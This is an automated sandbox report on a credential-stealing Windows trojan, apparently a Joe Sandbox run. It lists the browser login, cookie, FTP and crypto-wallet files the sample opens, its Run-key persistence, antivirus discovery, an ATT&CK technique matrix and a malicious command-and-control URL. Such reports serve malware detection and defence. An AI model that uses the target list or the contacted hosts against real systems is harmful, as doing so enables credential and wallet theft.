                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0079A8E0 GetVersionExW,0_2_0079A8E0
                Source: C:\Users\Public\Netstat\dileapp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: dileapp.exe, 00000009.00000003.1912623150.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969012358.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001ABB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050545971.0000000001A90000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2009480307.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050545971.0000000001ABB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001A90000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132518246.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133135957.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\Public\Netstat\dileapp.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara matchFile source: Process Memory Space: dileapp.exe PID: 7984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dileapp.exe PID: 7568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dileapp.exe PID: 5448, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: dileapp.exe, 00000009.00000003.1888884625.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ets/Electrum-LTCQN2
                Source: dileapp.exe, 00000009.00000003.1888860647.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: dileapp.exe, 00000009.00000002.1970339338.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyi
                Source: dileapp.exe, 00000009.00000003.1888860647.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: dileapp.exe, 0000000F.00000003.2008902691.0000000000F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \\Exodus\\exodus{
                Source: dileapp.exe, 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: dileapp.exe, 0000000C.00000003.1900851363.0000000001B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance
                Source: dileapp.exe, 00000009.00000003.1888860647.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: dileapp.exe, 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: dileapp.exe, 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: dileapp.exe, 0000000C.00000003.1926780706.0000000001B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\Public\Netstat\dileapp.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\Public\Netstat\dileapp.exe; Directory queried: C:\Users\user\Documents\JSDNGYCOWY
                Source: C:\Users\Public\Netstat\dileapp.exe; Directory queried: C:\Users\user\Documents\XZXHAVGRAG
                Source: C:\Users\Public\Netstat\dileapp.exe; Directory queried: C:\Users\user\Documents\NIKHQAIQAU
                Source: C:\Users\Public\Netstat\dileapp.exe; Directory queried: C:\Users\user\Documents\WKXEWIOTXI
                Source: Yara match; File source: Process Memory Space: dileapp.exe PID: 7568, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: dileapp.exe PID: 5448, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match; File source: Process Memory Space: dileapp.exe PID: 7984, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: dileapp.exe PID: 7568, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: dileapp.exe PID: 5448, type: MEMORYSTR
                Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | 1 Scripting | Valid Accounts | 2 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 13 Command and Scripting Interpreter | 1 DLL Side-Loading | 12 Process Injection | 3 Obfuscated Files or Information | LSASS Memory | 12 File and Directory Discovery | Remote Desktop Protocol | 41 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 13 Software Packing | Security Account Manager | 246 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 771 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 34 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 34 Virtualization/Sandbox Evasion | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
[Behavior graph. Behavior Graph ID: 1565453, Sample: file.exe, Startdate: 29/11/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
| file.exe | 29% | ReversingLabs | Win32.Trojan.Symmi | |
| file.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
| C:\Users\Public\Netstat\dileapp.exe | 100% | Avira | TR/Crypt.XPACK.Gen | |
| C:\Users\Public\Netstat\dileapp.exe | 100% | Joe Sandbox ML | | |

No Antivirus matches
No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| water-acidict.cyou | 172.67.156.217 | true | true | | unknown |
| www.google.com | 142.250.181.100 | true | false | | high |
| iplogger.co | 172.67.167.249 | true | false | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
| https://water-acidict.cyou/api | true | Avira URL Cloud: safe | unknown |
| https://iplogger.co/1tJFB4 | false | | unknown |
| https://iplogger.co/favicon.ico | false | Avira URL Cloud: safe | unknown |
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://water-acidict.cyou/apiedileapp.exe, 0000000C.00000003.1980496225.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980557308.0000000006035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://water-acidict.cyou:443/api_dileapp.exe, 0000000F.00000002.2133021309.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesdileapp.exe, 00000009.00000003.1812680278.00000000057E2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000005FE2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://water-acidict.cyou/apixddileapp.exe, 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954874686.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://contile-images.services.mozilla.com/obgoOYdileapp.exe, 0000000F.00000003.2132165164.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133194684.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://support.microdileapp.exe, 00000009.00000003.1812600714.0000000005864000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901988721.0000000006062000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984241620.0000000005C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://iplogger.co/https://iplogger.co/1tJFB4iplogger.co/1tJFB4dileapp.exe, 00000009.00000003.1812680278.0000000005801000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1812600714.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901988721.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000006001000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984241620.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://water-acidict.cyou/dileapp.exe, 00000005.00000002.1749293398.00000000015C2000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000003.1740124665.00000000015C2000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1970391801.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969486720.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1888884625.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1968959051.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1888558428.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811421821.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1927382793.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1951791615.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052600366.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1926780706.0000000001B11000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2055278689.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980496225.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2045066427.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1952787217.0000000006035000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050815274.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980677857.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 
0000000C.00000003.1980367222.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050916966.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001B0F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://water-acidict.cyou/apiadileapp.exe, 0000000F.00000003.2103253174.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133309995.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2124156785.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132117784.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132494268.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
239.255.255.250 | unknown | Reserved | unknown | unknown | false
104.21.82.93 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.67.156.217 | water-acidict.cyou | United States | 13335 | CLOUDFLARENETUS | true
172.67.167.249 | iplogger.co | United States | 13335 | CLOUDFLARENETUS | false
142.250.181.100 | www.google.com | United States | 15169 | GOOGLEUS | false

IP
192.168.2.4
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1565453
Start date and time: 2024-11-29 23:09:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@32/5@9/6
EGA Information:
• Successful, ratio: 20%
HCA Information: Failed
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.19.238, 74.125.205.84, 34.104.35.123, 23.218.208.109, 93.184.221.240, 192.229.221.95, 172.217.17.67, 172.217.17.46
                                                                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                                                      • Execution Graph export aborted for target dileapp.exe, PID 3696 because there are no executed function
                                                                                      • Execution Graph export aborted for target dileapp.exe, PID 5448 because there are no executed function
                                                                                      • Execution Graph export aborted for target dileapp.exe, PID 7568 because there are no executed function
                                                                                      • Execution Graph export aborted for target dileapp.exe, PID 7984 because there are no executed function
                                                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: file.exe
Time | Type | Description
17:10:03 | API Interceptor | 26x Sleep call for process: dileapp.exe modified
22:09:55 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\dileapp.exe
22:10:04 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\dileapp.exe
22:10:12 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      • 1.1.1.1
                                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.67.165.166
                                                                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf8ffsvfmlfiofgxffEnfszflhfitfgCvf9vfszflvfgtfgwvf8DfszfmDfgDfg*~*ffafflffipfgxffBvfsDfrvfiffgvff9ffrnflrfllfgsff8vfrffrjfirfgsff7ffrnfrnflhfgsff9ffEffmffitfgsff7vfEvflDfihfgAff8fftnflzflrfikfgwvfsDfuvfiffgAff9vfqnfrnfihfiiff9ffsfflDflpfgBffBvftnflDfitfgyffBvfsfflzflrfikffBvftfflnflpfgCffBvfEvfmfflpfilfgxvfsffrzflrfihff8vfrvflrfmDfgvffDffrnfkzfllfgxfgwffrvfl9flpfgAfgwffqnfmjfipfiiff7vfqnflvfllfiiff8vfqnfmffllfgwfgwffqnflDfilfgDffEffDDfmffinfgxfgxvfsvfmffijfi9fg*~*ffvnfuvff====___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjczN2NjZDA5MTMxODVlMzdkYWUzNjFjZjM4Yzg3Y2ZlOjc6ZjRkNToxN2E5YzZkNWIxZGY2MjgxODRlOTdhNmI5MDkxMDNmY2VkOTNmZGVmZWNhODNlZDEwNTdjNGFkZGY2ZGVlMDc5Omg6VDpUGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.140.160
                                                                                                                                      https://clienti.documentipostali.it/#/public/email/a703266c-62aa-4024-8f0c-254725c31c25-DD0015830773-D0002973415Get hashmaliciousUnknownBrowse
                                                                                                                                      • 104.17.25.14
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                      • 172.67.165.166
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      https://economiesocialeestrie-my.sharepoint.com/:f:/g/personal/cynthia_economiesocialeestrie_ca/Eg3bU_gVnldCmtzlGs9oSUQBYKQRNnAURt93MlkOZFbwAg?email=gaston.stratford%40assnat.qc.ca&e=iSpthp&xsdata=MDV8MDJ8R2FzdG9uLlN0cmF0Zm9yZEBhc3NuYXQucWMuY2F8Y2RjYmI0YjE1ZGI0NGZhNmQzYjUwOGRkMTA4MmQxNTh8MWE1NjE5ODBkNjc0NGQzMGEyOTc1ODhjMDdhODMzNTN8MHwwfDYzODY4NDg3NjU1MjMyNTA1OHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SkZiWEIwZVUxaGNHa2lPblJ5ZFdVc0lsWWlPaUl3TGpBdU1EQXdNQ0lzSWxBaU9pSlhhVzR6TWlJc0lrRk9Jam9pVFdGcGJDSXNJbGRVSWpveWZRPT18MHx8fA%3d%3d&sdata=YVp6WGNQM0psVGw2TU5teXRVbmhhMy9VaDRhYW5SeWdTN0pDaTBKV2p2Yz0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 1.1.1.1
                                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.67.165.166
                                                                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 104.21.16.9
                                                                                                                                      https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf8ffsvfmlfiofgxffEnfszflhfitfgCvf9vfszflvfgtfgwvf8DfszfmDfgDfg*~*ffafflffipfgxffBvfsDfrvfiffgvff9ffrnflrfllfgsff8vfrffrjfirfgsff7ffrnfrnflhfgsff9ffEffmffitfgsff7vfEvflDfihfgAff8fftnflzflrfikfgwvfsDfuvfiffgAff9vfqnfrnfihfiiff9ffsfflDflpfgBffBvftnflDfitfgyffBvfsfflzflrfikffBvftfflnflpfgCffBvfEvfmfflpfilfgxvfsffrzflrfihff8vfrvflrfmDfgvffDffrnfkzfllfgxfgwffrvfl9flpfgAfgwffqnfmjfipfiiff7vfqnflvfllfiiff8vfqnfmffllfgwfgwffqnflDfilfgDffEffDDfmffinfgxfgxvfsvfmffijfi9fg*~*ffvnfuvff====___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjczN2NjZDA5MTMxODVlMzdkYWUzNjFjZjM4Yzg3Y2ZlOjc6ZjRkNToxN2E5YzZkNWIxZGY2MjgxODRlOTdhNmI5MDkxMDNmY2VkOTNmZGVmZWNhODNlZDEwNTdjNGFkZGY2ZGVlMDc5Omg6VDpUGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.140.160
